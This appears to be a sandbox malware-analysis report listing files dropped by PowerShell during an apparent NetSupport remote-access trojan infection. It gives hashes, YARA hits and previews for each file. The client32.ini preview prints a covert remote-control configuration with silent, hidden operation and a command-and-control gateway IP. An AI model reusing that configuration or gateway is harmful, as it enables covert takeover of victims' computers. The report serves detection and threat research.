                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Roaming\HHIAHYOW-5\CXCC.zip

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                            Category:dropped
                                                                            Size (bytes):2277965
                                                                            Entropy (8bit):7.997315044740122
                                                                            Encrypted:true
                                                                            SSDEEP:49152:a51ZlWlEDThXBJOhHvh6J6h2SFFGf0RBNTQfYc9jh23eWeB3/YSBm7WIqRRakTSA:E17FXa/hRFY89YYc9jh23redpmQR5
                                                                            MD5:951A4904B64B991D1834CFECE9EFC1DC
                                                                            SHA1:52EDF0F5A1E24F0B988E84F738544750F9CF2248
                                                                            SHA-256:A685F2AB98075CE17B87C6F1E5A0160AB556DFEC6F9ACE0CDD7EE48D57CBD2D3
                                                                            SHA-512:806DC4D3386B76601D1A062DB6784BA8DF760784FB7F0AF8B5A878A0D27120C69C6E6C48B68F13E23FC95BD83EBD3BCBADFD5637877F9F089A205848DBF3B345
                                                                            Malicious:false
                                                                            Preview:PK.........DWW..%.&l..........client32.exe.|.xT.....N..".R....A.W..@........Tj.$...Q.@... ...7!...@..iJ.......;3....R..~.....;g...3gfnx...T.@......b../....d.@...n{...ts....5d.....]%.i..v...:3lZ..i]G.9v.:...\__...F.).C....(..B..t..P.f....&..9..e.k9.:.K.X...8..`.@...Oph.@W...B.p....N.]A.....A^...!..Y..T...+..t........`..KUg.....`..]w..=k...g...7.......4<..=f..|..8T.."...z..:..ae>s.L.(....f.U.%=.).Iq.....T..px-..8G.G...`8.>{#.=....&B..G..)t........uY:R0..C.....C.........G......1r.e..K5HMop..ZJ..6.&...fM.........m....G..W.I0....hb.."NDS5...>MTz-.".i.....v..[..JC.dC........^4....4.W.U.SZ.'..........O...C.O.+..X...Cs.)S.L`3'8t.....Y..Te....~aS.G...M......9..g......0}.|-.;..N%....Hi......$.....kC..t..`..,..!&..X..$.6k..v....o_.I.......x......?_..'.A..../`S.b...u.].....t..9.6...g.l..|.2...Nte.}.N....]........)d..Q{.>g.p?G.O...g.......S.Z*.-.....^.......[......V..i...V.oh.~l+......R9.}W.F..q....4...._`G.CK..u.@l.....7l.W/..b.&... H.1..I.........

                                                                            C:\Users\user\AppData\Roaming\HHIAHYOW-5\HTCTL32.DLL

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):328056
                                                                            Entropy (8bit):6.7547459359511395
                                                                            Encrypted:false
                                                                            SSDEEP:6144:Hib5YbsXPKXd6ppGpwpbGf30IVFpSzyaHx3/4aY5dUilQpAf84lH0JYBAnM1OKB:Hib5YbsXioEgULFpSzya9/lY5SilQCfR
                                                                            MD5:C94005D2DCD2A54E40510344E0BB9435
                                                                            SHA1:55B4A1620C5D0113811242C20BD9870A1E31D542
                                                                            SHA-256:3C072532BF7674D0C5154D4D22A9D9C0173530C0D00F69911CDBC2552175D899
                                                                            SHA-512:2E6F673864A54B1DCAD9532EF9B18A9C45C0844F1F53E699FADE2F41E43FA5CBC9B8E45E6F37B95F84CF6935A96FBA2950EE3E0E9542809FD288FEFBA34DDD6A
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\HTCTL32.DLL, Author: Joe Security
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 13%
                                                                            Joe Sandbox View:
                                                                            • Filename: Update.js, Detection: malicious, Browse
                                                                            • Filename: update.js, Detection: malicious, Browse
                                                                            • Filename: updates.js, Detection: malicious, Browse
                                                                            • Filename: updates.js, Detection: malicious, Browse
                                                                            • Filename: Update 124.0.6367.158.js, Detection: malicious, Browse
                                                                            • Filename: updates.js, Detection: malicious, Browse
                                                                            • Filename: Update 124.0.6367.158.js, Detection: malicious, Browse
                                                                            • Filename: Update_124.0.6367.158.js, Detection: malicious, Browse
                                                                            • Filename: MDE_File_Sample_c035ea05c53efc10b65ede03b5550188cbb2e484.zip, Detection: malicious, Browse
                                                                            • Filename: update.js, Detection: malicious, Browse
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A...A...A.......A...9...A...A..gA....1..A....0.A.......A.......A.......A..Rich.A..........PE..L.....V...........!.................Z.......................................P......._....@......................... ...k....y..x.......@...............x).......0..................................._..@............................................text............................... ..`.rdata..............................@..@.data....f.......(...v..............@....rsrc...@...........................@..@.reloc..b1.......2..................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Roaming\HHIAHYOW-5\LogoDev.png

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:PNG image data, 600 x 600, 8-bit/color RGBA, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):24504
                                                                            Entropy (8bit):7.872865717955356
                                                                            Encrypted:false
                                                                            SSDEEP:384:qSVmAf6Ft8Itb+e2b9tdTwEy9kXs6vWZZCbiXSeEO/12Hb40yrWSbN8qtA:qImAfe7gx3y6MZC2CeV2747zbN8
                                                                            MD5:B8F553FBD3DC34B58BC77A705711023D
                                                                            SHA1:4AB1052F906FDA96F877E398426DA5646574C878
                                                                            SHA-256:2761C60263A2919B856915BDD2A0604B7F0E56E59D893AB13CCCEF2B7C967229
                                                                            SHA-512:15A1DF0DBB06B4BB64A2B8CD7AD22578292D5ECDEC64303350E027F9F87FA8A825CB1CC97F94862D8C235C85B0C79A4FEABFB89D9E0B77BE62AAB25785122A60
                                                                            Malicious:false
                                                                            Preview:.PNG........IHDR...X...X......f...._.IDATx........................................................................................................................................................................................................................................................f...:.(L..A!..].'twW..3.2 ..........'k.]Kd.|...mz..U...Tu.L..~.W.Wc......................rv.iv%.q=....u..>.o.......k.y.wo........ .,...~..U..._.7/g.........m.....*w.`........p.....8...q.,.,.g....:Q.Rt....Ga.............Z..S+.....=.,....T.Ew.....0U..`.....S.......w....Va..#.|Mo.....eY.eY....m^....r.P..S{#......D.I.y..K.&&9....@...u.^...D.....U..l.keY.eY....rv.]..H..A....^..RpQ.)@,.Im..s.~.U.....,j....._m?.V...z95l}.,.,.P....b..R.>rV.Q_m.0....(.b..@.,./.T[.S;.X....`..w.,...j.o..M.......~^......0.8.....$][=`.V.)..O..1....+...3...eY.e.[.]....s...z.E\.I!G..;).'...d.m>..+w.M.=X.S......g.o.~0........j.{.hY.eY.7.................G..e(K...y..IL.F)g..{.....Z.J}...qn..+.%

                                                                            C:\Users\user\AppData\Roaming\HHIAHYOW-5\NSM.LIC

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):195
                                                                            Entropy (8bit):4.924914741174998
                                                                            Encrypted:false
                                                                            SSDEEP:6:O/oPITDKHMoEEjLgpVUK+Odfu2M0M+ZYpPM/iotqO2La8l6i7s:XAyJjjqVUKHdW2MdRPM/iotq08l6J
                                                                            MD5:E9609072DE9C29DC1963BE208948BA44
                                                                            SHA1:03BBE27D0D1BA651FF43363587D3D6D2E170060F
                                                                            SHA-256:DC6A52AD6D637EB407CC060E98DFEEDCCA1167E7F62688FB1C18580DD1D05747
                                                                            SHA-512:F0E26AA63B0C7F1B31074B9D6EEF88D0CFBC467F86B12205CB539A45B0352E77CE2F99F29BAEAB58960A197714E72289744143BA17975699D058FE75D978DFD0
                                                                            Malicious:true
                                                                            Preview:1200..0x3ca968c5....[[Enforce]]....[_License]..control_only=0..expiry=01/01/2028..inactive=0..licensee=XMLCTL..maxslaves=9999..os2=1..product=10..serial_no=NSM303008..shrink_wrap=0..transport=0..

                                                                            C:\Users\user\AppData\Roaming\HHIAHYOW-5\NSM.ini

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:Generic INItialization configuration [Features]
                                                                            Category:dropped
                                                                            Size (bytes):6458
                                                                            Entropy (8bit):4.645519507940197
                                                                            Encrypted:false
                                                                            SSDEEP:96:B6pfGAtXOdwpEKyhuSY92fihuUhENXh8o3IFhucOi49VLO9kNVnkOeafhuK7cwo4:BnwpwYFuy6/njroYbe3j1vlS
                                                                            MD5:88B1DAB8F4FD1AE879685995C90BD902
                                                                            SHA1:3D23FB4036DC17FA4BEE27E3E2A56FF49BEED59D
                                                                            SHA-256:60FE386112AD51F40A1EE9E1B15ECA802CED174D7055341C491DEE06780B3F92
                                                                            SHA-512:4EA2C20991189FE1D6D5C700603C038406303CCA594577DDCBC16AB9A7915CB4D4AA9E53093747DB164F068A7BA0F568424BC8CB7682F1A3FB17E4C9EC01F047
                                                                            Malicious:false
                                                                            Preview:..[General]..ClientParams=..CLIENT32=..Installdir=..NOARP=..SuppressAudio=......[Features]..Client=1..Configurator=..Control=..Gateway=..PINServer=..RemoteDeploy=..Scripting=..Student=..TechConsole=..Tutor=......[StartMenuIcons]..ClientIcon=..ConfigIcon=..ControlIcon=..RemoteDeployIcon=..ScriptingIcon=..TechConsoleIcon=..TutorIcon=......[DesktopIcons]..ControlDeskIcon=..TechConsoleDeskIcon=..TutorDeskIcon=............; This NSM.ini file can be used to customise the component selections when performing a silent installation of the product.....; Client=<1/Blank>..; e.g...; Client=1..; Controls whether the client component is installed (1) on the target machine or not (Blank)..;....; CLIENT32=<blank/not blank>..; e.g...;. CLIENT32=..;. Setting this to anything causes the Client Service (if installed) to be set to manual start rather than automatic..;....; ClientIcon=<1/Blank>..; e.g...; ClientIcon=1..; Controls whether shortcut icons are placed on t

                                                                            C:\Users\user\AppData\Roaming\HHIAHYOW-5\PCICHEK.DLL

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):18808
                                                                            Entropy (8bit):6.292094060787929
                                                                            Encrypted:false
                                                                            SSDEEP:192:dogL7bo2t6n76RRHirmH/L7jtd3hfwjKd3hfwB7bjuZRvI:dogL7bo2YrmRTAKT0iTI
                                                                            MD5:104B30FEF04433A2D2FD1D5F99F179FE
                                                                            SHA1:ECB08E224A2F2772D1E53675BEDC4B2C50485A41
                                                                            SHA-256:956B9FA960F913CCE3137089C601F3C64CC24C54614B02BBA62ABB9610A985DD
                                                                            SHA-512:5EFCAA8C58813C3A0A6026CD7F3B34AD4FB043FD2D458DB2E914429BE2B819F1AC74E2D35E4439601CF0CB50FCDCAFDCF868DA328EAAEEC15B0A4A6B8B2C218F
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\PCICHEK.DLL, Author: Joe Security
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 5%
                                                                            Joe Sandbox View:
                                                                            • Filename: Update.js, Detection: malicious, Browse
                                                                            • Filename: update.js, Detection: malicious, Browse
                                                                            • Filename: updates.js, Detection: malicious, Browse
                                                                            • Filename: updates.js, Detection: malicious, Browse
                                                                            • Filename: Update 124.0.6367.158.js, Detection: malicious, Browse
                                                                            • Filename: updates.js, Detection: malicious, Browse
                                                                            • Filename: Update 124.0.6367.158.js, Detection: malicious, Browse
                                                                            • Filename: Update_124.0.6367.158.js, Detection: malicious, Browse
                                                                            • Filename: MDE_File_Sample_c035ea05c53efc10b65ede03b5550188cbb2e484.zip, Detection: malicious, Browse
                                                                            • Filename: update.js, Detection: malicious, Browse
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Yu....i...i...i.......i..Z...i.......i......i......i..l....i...h.~.i......i......i......i.......i.Rich..i.................PE..L....A.W...........!......................... ...............................`.......U....@.........................@#..r...h!..P....@............... ..x)...P......P ............................... ..@............ ..D............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Roaming\HHIAHYOW-5\PCICL32.DLL

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):3740024
                                                                            Entropy (8bit):6.527276298837004
                                                                            Encrypted:false
                                                                            SSDEEP:49152:0KJKmPEYIPqxYdoF4OSvxmX3+m7OTqupa7HclSpTAyFMJa:0KJ/zIPq7F4fmXO8u6kS+y/
                                                                            MD5:D3D39180E85700F72AAAE25E40C125FF
                                                                            SHA1:F3404EF6322F5C6E7862B507D05B8F4B7F1C7D15
                                                                            SHA-256:38684ADB2183BF320EB308A96CDBDE8D1D56740166C3E2596161F42A40FA32D5
                                                                            SHA-512:471AC150E93A182D135E5483D6B1492F08A49F5CCAB420732B87210F2188BE1577CEAAEE4CE162A7ACCEFF5C17CDD08DC51B1904228275F6BBDE18022EC79D2F
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\PCICL32.DLL, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\PCICL32.DLL, Author: Joe Security
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 17%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........J.>N+.mN+.mN+.m.eAmL+.mU.Gmd+.m!]rmF+.mU.EmJ+.mGSZmA+.mGS]mO+.mGSJmi+.mN+.m.(.mU.rm.+.mU.sm.+.mU.BmO+.mU.CmO+.mU.DmO+.mRichN+.m........................PE..L......X...........!.....(...$ .............@................................9.....Y.9.............................p................p................8.x)...`7.p....Q.......................c......@c..@............@..(.......`....................text...l'.......(.................. ..`.rdata..s....@.......,..............@..@.data....%... ......................@....tls.........P......................@....hhshare.....`......................@....rsrc........p......................@..@.reloc...3...`7..4....6.............@..B................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Roaming\HHIAHYOW-5\Setup\Sigma\Advertising

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text
                                                                            Category:dropped
                                                                            Size (bytes):2463
                                                                            Entropy (8bit):4.467188346618147
                                                                            Encrypted:false
                                                                            SSDEEP:48:XZfQr+iDzuMbRmWf2/wu8I6nzsCEak0V9OTG3NOirrY:XZ473RBfiw/HzsCH9o/yY
                                                                            MD5:326DDFFC1F869B14073A979C0A34D34D
                                                                            SHA1:DF08E9D94AD0FAD7CC7D2D815EE7D8B82EC26E63
                                                                            SHA-256:D4201EFD37AEC4552E7AA560A943B4A8D10D08AF19895E6A70991577609146FB
                                                                            SHA-512:3822E64CA9CF23E50484AFCC2222594B4B2C7CD8C4E411F557ABEA851AE7CBD57F10424C0C9D8B0B6A5435D6F28F3B124C5BC457A239F0A2F0CAF433B01DA83F
                                                                            Malicious:false
                                                                            Preview:4dex.io/.ebaystatic.com/.widespace.com/.trafficjunky.net/.minutemedia-prebid.com/.programattik.com/.00px.net/.tsyndicate.com/.ownpage.fr/.ansira.com/.bfmio.com/.adsquare.com/.smct.io/.fengkongcloud.com/.pubwise.io/.admixer.net/.kameleoon.eu/.adelement.com/.fksnk.com/.ie8eamus.com/.aniview.com/.audrte.com/.insurads.com/.brid.tv/.polarcdn-pentos.com/.6sc.co/.ad.gt/.adskeeper.com/.cheqzone.com/.hybrid.ai/.adentifi.com/.cloud-media.fr/.justpremium.com/.refersion.com/.commander1.com/.cootlogix.com/.selectmedia.asia/.sddan.com/.a-mo.net/.2mdnsys.com/.presage.io/.2trk.info/.adnet.de/.dynata.com/.bidtheatre.com/.ufpcdn.com/.curalate.com/.digitaleast.mobi/.moatpixel.com/.yellowblue.io/.datamind.ru/.bumlam.com/.relevant-digital.com/.medialead.de/.iivt.com/.flux.jp/.adtelligent.com/.fqtag.com/.adalliance.io/.wpncdn.com/.webvisor.org/.kameleoon.io/.playwire.com/.visx.net/.gnezdo.ru/.otto.de/.socdm.com/.snigelweb.com/.powerad.ai/.kitewheel.com/.affec.tv/.basis.net/.servenobid.com/.tappx.com/.indexw

                                                                            C:\Users\user\AppData\Roaming\HHIAHYOW-5\Setup\Sigma\Content

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text
                                                                            Category:dropped
                                                                            Size (bytes):48
                                                                            Entropy (8bit):4.178175262485106
                                                                            Encrypted:false
                                                                            SSDEEP:3:hV23fASC+3A52IF3:f23x3AoI5
                                                                            MD5:7B0B4A9AAFC18CF64F4D4DAF365D2D8D
                                                                            SHA1:E9ED1ECBEC6CCCFEFE00F9718C93DB3D66851494
                                                                            SHA-256:0B55EB3F97535752D3C1EF6CEBE614B9B67DDDFCFD3C709B84C6ECAD6D105D43
                                                                            SHA-512:A579069B026ED2AAEF0BD18C3573C77BFB5E0E989C37C64243B12EE4E59635AAA9D9C9746F82DCC16CA85F091EC4372C63E294C25E48DFFFBED299567149C4E2
                                                                            Malicious:false
                                                                            Preview:my.mail.ru/.content-tracker.msedgedemo.example/.

                                                                            C:\Users\user\AppData\Roaming\HHIAHYOW-5\Setup\Sigma\Cryptomining

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text
                                                                            Category:dropped
                                                                            Size (bytes):32
                                                                            Entropy (8bit):3.952819531114783
                                                                            Encrypted:false
                                                                            SSDEEP:3:OLAbIW02IF3:OEIII5
                                                                            MD5:4EC1EDA0E8A06238FF5BF88569964D59
                                                                            SHA1:A2E78944FCAC34D89385487CCBBFA4D8F078D612
                                                                            SHA-256:696E930706B5D391EB8778F73B0627FFC2BE7F6C9A3E7659170D9D37FC4A97B5
                                                                            SHA-512:C9B1ED7B61F26D94D7F5EDED2D42D40F3E4300EEE2319FE28E04B25CDB6DD92DAF67828BFF453BF5FC8D7B6CEB58CAB319FC0DAAC9B0050E27A89EFE74D2734E
                                                                            Malicious:false
                                                                            Preview:cryptominer.msedgedemo.example/.

                                                                            C:\Users\user\AppData\Roaming\HHIAHYOW-5\Setup\Sigma\Fingerprinting

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text
                                                                            Category:dropped
                                                                            Size (bytes):172
                                                                            Entropy (8bit):4.35640367318307
                                                                            Encrypted:false
                                                                            SSDEEP:3:OL0iGKKGvJMM3fvaIDOGTKvWAXW/LK0KEExV5VZmLVrXLU52IF3:A06v+MfrCG1/LKjPVZMFLUoI5
                                                                            MD5:3852430540E0356D1BA68F31BE011533
                                                                            SHA1:D3F622450BCF0CED36D9D9C0AAD630EBCCFCB7FF
                                                                            SHA-256:F1F413704C32A28A31A646F60CAD36CC2DA793E143F70EEE72AE56F736DF8054
                                                                            SHA-512:7A4FAA493C141EA88D6CD933DFC0B50EF6D25983323DB2B931C7512E039859D60C4935E56B771264CA72B45C035B1962AD8680D616EAAF04FBC5A6E0B674E435
                                                                            Malicious:false
                                                                            Preview:zadn.vn/.ansira.com/.fcmatch.google.com/.origo.hu/.fcmatch.youtube.com/.refersion.com/.flocktory.com/.vtex.com.br/.rqtrk.eu/.vocento.com/.fingerprinter.msedgedemo.example/.

                                                                            C:\Users\user\AppData\Roaming\HHIAHYOW-5\Setup\Sigma\LICENSE

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):66
                                                                            Entropy (8bit):3.99590382426697
                                                                            Encrypted:false
                                                                            SSDEEP:3:aeBX+4AuXEJOpKPudp:3XVAuXEs+udp
                                                                            MD5:5B7BAF861A48C045D997992424B5877B
                                                                            SHA1:2B2BD9A13AFE49748ABF39FAF9EB29ED658F066E
                                                                            SHA-256:44071E0FCFFB9A9A32E8FA7010BB18DBC41AFD0B176F81BF700B15B638A88A51
                                                                            SHA-512:4820B41AA5FF4D934A583E1F0B93B1512631102BB2DFDB74792A2F0DCF9907DA7680C02A5DDD2492A1E6D58CDADA3453D9E38BB8DEAB6CE831FF36A7F8DE016C
                                                                            Malicious:false
                                                                            Preview:Licensed under a separate commercial license from Disconnect, Inc.

                                                                            C:\Users\user\AppData\Roaming\HHIAHYOW-5\Setup\Sigma\Other

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text
                                                                            Category:dropped
                                                                            Size (bytes):91
                                                                            Entropy (8bit):4.207916880795248
                                                                            Encrypted:false
                                                                            SSDEEP:3:k5Ks3OGTKv+vJKS8XWA3A52IF3:Fs+G7v4SVA3AoI5
                                                                            MD5:09CEDAA60EAB8C7D7644D81CF792FE76
                                                                            SHA1:E68E199C88EA96FCB94B720F300F7098B65D1858
                                                                            SHA-256:C8505EA2FE1B8F81A1225E4214AD07D8D310705BE26B3000D7DF8234E0D1F975
                                                                            SHA-512:564F8E5C85208ADABB4B10763084B800022BB6D6D74874102E2F49CC8F17899CE18570AF1F462AA592A911E49086A2D1C2D750B601EEDD2F61D1731689A0A403
                                                                            Malicious:false
                                                                            Preview:dartsearch.net/.fcmatch.youtube.com/.fcmatch.google.com/.other-tracker.msedgedemo.example/.

                                                                            C:\Users\user\AppData\Roaming\HHIAHYOW-5\Setup\Sigma\Staging

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text
                                                                            Category:dropped
                                                                            Size (bytes):16528
                                                                            Entropy (8bit):4.551178727174085
                                                                            Encrypted:false
                                                                            SSDEEP:384:lMFqdq0kM55olQws9gsLW4nMFCw8oaj7CQB:lGOqPM5mlQXgeWaMFvanCs
                                                                            MD5:39BDF35AC4557A2D2A4EFDEEB038723E
                                                                            SHA1:9703CA8AF3432B851CB5054036DE32F8BA7B083F
                                                                            SHA-256:04441A10B0B1DEEE7996E298949AC3B029BD7C24257FAF910FE14F9996BA12AE
                                                                            SHA-512:732337F7B955E6ACAF1E3AAA3395BC44C80197D204BD3CBB3E201B6177AF6153CC9D7B22AD0E90B36796F92B0022806C32AC763EAEC733B234503890900BF284
                                                                            Malicious:false
                                                                            Preview:aboardlevel.com/.cushiondrum.com/.connectad.io/.attractionbanana.com/.klevu.com/.stripchat.com/.360.cn/.barbarousbase.com/.tailtarget.com/.spottednoise.com/.kickfire.com/.createsend24.com/.dampdock.com/.equablekettle.com/.cmail18.com/.blesspizzas.com/.p7cloud.net/.smadex.com/.responder.co.il/.condemnedcomb.com/.aquaticowl.com/.operationchicken.com/.baitbaseball.com/.cumbersomecarpenter.com/.scrapesleep.com/.clammychicken.com/.6sense.com/.unwieldyplastic.com/.sailthru.com/.gondolagnome.com/.shakysurprise.com/.impactcdn.com/.ancientact.com/.maillist-manage.in/.bushesbag.com/.rmtag.com/.mkt8628.com/.faultycanvas.com/.fewkittens.com/.createsend6.com/.cartkitten.com/.cmail12.com/.fixedfold.com/.cmail21.com/.strangeclocks.com/.lunchroomlock.com/.stimulatingsneeze.com/.conditioncrush.com/.crimsonmeadow.com/.combcompetition.com/.mkt8586.com/.motionflowers.com/.a-mx.com/.combcattle.com/.opti-digital.com/.sundaysky.com/.aliveachiever.com/.actuallything.com/.knottyswing.com/.damagedadvice.com/.ak

                                                                            C:\Users\user\AppData\Roaming\HHIAHYOW-5\TCCTL32.DLL

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):396664
                                                                            Entropy (8bit):6.80911343409989
                                                                            Encrypted:false
                                                                            SSDEEP:12288:HqArkLoM/5iec2yxvUh3ho2LDnOQQ1k3+h9APjbom/n6:ekuK2XOjksobom/n6
                                                                            MD5:2C88D947A5794CF995D2F465F1CB9D10
                                                                            SHA1:C0FF9EA43771D712FE1878DBB6B9D7A201759389
                                                                            SHA-256:2B92EA2A7D2BE8D64C84EA71614D0007C12D6075756313D61DDC40E4C4DD910E
                                                                            SHA-512:E55679FF66DED375A422A35D0F92B3AC825674894AE210DBEF3642E4FC232C73114077E84EAE45C6E99A60EF4811F4A900B680C3BF69214959FA152A3DFBE542
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\TCCTL32.DLL, Author: Joe Security
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 6%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............z..z..z.....z.....z.....z..{.Y.z....K.z......z.....z......z.....z.Rich.z.........PE..L....8.W...........!................'................................................P....@.............................o...D...x....0..@...............x)...@..\E..................................Pd..@...............h............................text............................... ..`.rdata..............................@..@.data...h............|..............@....rsrc...@....0......................@..@.reloc...F...@...H..................@..B................................................................................................................................................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):103824
                                                                            Entropy (8bit):6.674952714045651
                                                                            Encrypted:false
                                                                            SSDEEP:768:q78j0+RH6e6XhBBxUcnRWIDDDDDDDDDDDDDDDDADDDDDDDDDDDDDDDDDDDDDDXDU:qwpHLiLniepfxP91/bQxnu
                                                                            MD5:C4F1B50E3111D29774F7525039FF7086
                                                                            SHA1:57539C95CBA0986EC8DF0FCDEA433E7C71B724C6
                                                                            SHA-256:18DF68D1581C11130C139FA52ABB74DFD098A9AF698A250645D6A4A65EFCBF2D
                                                                            SHA-512:005DB65CEDAACCC85525FB3CDAB090054BB0BB9CC8C37F8210EC060F490C64945A682B5DD5D00A68AC2B8C58894B6E7D938ACAA1130C1CC5667E206D38B942C5
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe, Author: Joe Security
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 27%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............i...i...i.......i..6....i...h...i..6...i..6..i..6....i.Rich..i.........................PE..L....iMR.....................v...... ........ ....@.................................<h....@.................................< ..<....0...q...........|.............. ............................................... ...............................text............................... ..`.rdata..V.... ......................@..@.rsrc....q...0...r..................@..@.reloc..l............z..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.ini

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):670
                                                                            Entropy (8bit):5.4631538862492635
                                                                            Encrypted:false
                                                                            SSDEEP:12:u3xS2hz7q+j8ZGShR8kkivlnxOZ7+DP981E7GXXfDWQCYnmSuMtQAfRTtEa:u3I2hzp8ZNR8pivlnxOoG1fXXfD/lQAp
                                                                            MD5:15221731B8C78D255535A98220F55385
                                                                            SHA1:917CBA1D62DC16241700AC2027A67B62DBD03450
                                                                            SHA-256:B23705DDAF4DD0DA82EA5C70F7B406F13529B624DFCF8EC2C9099C07DE5B997D
                                                                            SHA-512:0883C5B8BD9865FA31614F7C8054144323DD4FC5ACD73F7E1DEC1782B1BDB2DA7F7AF4AA9BBA76847EEE42A566C5843B2F021ACCAB477805BABAB89DB6DCCF03
                                                                            Malicious:false
                                                                            Preview:0x748b6d2f....[Client].._present=1..AlwaysOnTop=1..DisableChat=1..DisableChatMenu=1..DisableClientConnect=1..DisableCloseApps=1..DisableDisconnect=0..DisableManageServices=0..DisableReplayMenu=1..DisableRequestHelp=1..HideWhenIdle=1..Protocols=3..RADIUSSecret=dgAAAPpMkI7ke494fKEQRUoablcA..RoomSpec=Eval..silent=1..SKMode=1..SysTray=0..UnloadMirrorOnDisconnect=1..Usernames=*....[_Info]..Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32u.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[General]..BeepUsingSpeaker=0....[HTTP]..GatewayAddress=5.181.159.137:443..gskmode=0..GSK=FH9I<H?LDJHB<A@CCHHD;K?M..GSKX=EIHJ=HBKHH;L>GCIFI;H>MCP..

